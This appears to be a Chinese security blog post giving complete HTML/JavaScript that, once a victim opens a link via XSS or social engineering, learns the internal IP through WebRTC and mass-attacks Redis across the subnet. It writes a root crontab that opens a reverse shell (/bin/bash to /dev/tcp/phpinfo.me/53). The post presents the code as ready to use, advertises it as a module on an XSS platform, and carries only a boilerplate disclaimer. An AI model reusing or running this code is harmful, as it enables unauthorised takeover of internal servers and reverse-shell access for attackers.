利用xss或者社工让对方点我的链接,然后利用js自动化攻击内网redis,
利用redis写任务计划批量反弹shell。
js扫内网6379不太好实现,就不进行端口探测了,直接对整个网段执行一遍exp
利用如下代码获取内网ip段:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Document</title>
</head>
<body>
</body>
<script>
ipList = []
var webrtcxss = {
webrtc : function(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection){
servers = {iceServers: []};
}
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
});
},
getIp : function(){
this.webrtc(function(ip){
ipList.push(ip);
});
}
}
webrtcxss.getIp()
setTimeout(function() {
alert(ipList)
}, 300)
</script>
</html>
效果如下图
利用ajax攻击redis原理:
参考文章:http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://www.t00ls.net/thread-34873-1-1.html
http://www.freebuf.com/articles/web/19622.html
下面是一个ajax操作redis写任务计划反弹的例子:
var ip = '192.168.203.2'; var port= '6379'; var dir = '/var/spool/cron/'; var filename = 'root'; var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1'; var url = "http://" + ip + ":" + port; var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n"); var cmd = new XMLHttpRequest(); cmd.open("POST", url); cmd.send('save\r\n');
最后来实现自动获取内网ip,自动批量攻击内网1-255的ip
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Document</title>
</head>
<body>
</body>
<script>
ipList = []
var webrtcxss = {
webrtc : function(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection){
servers = {iceServers: []};
}
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
});
},
getIp : function(){
this.webrtc(function(ip){
ipList.push(ip);
});
}
}
webrtcxss.getIp()
setTimeout(function() {
for(var i in ipList) {
if(ipList[i]) {
var iparr = ipList[i].split(".");
for(var i=0;i<255;i++) {
var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
send(attkip);
}
}
}
}, 300);
function send(ip) {
var port= '6379';
var dir = '/var/spool/cron/';
var filename = 'root';
var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
var url = "http://" + ip + ":" + port;
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
var cmd = new XMLHttpRequest();
cmd.open("POST", url);
cmd.send('save\r\n');
}
</script>
</html>
如果嫌1-255不够可以再加一个for循环
自动向内网redis发送攻击代码
然后在自己的服务器中用nc监听你设置的端口,然后你会发现服务器已经躺在这了
测试模块已加入xss平台:http://xss.phpinfo.me/
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论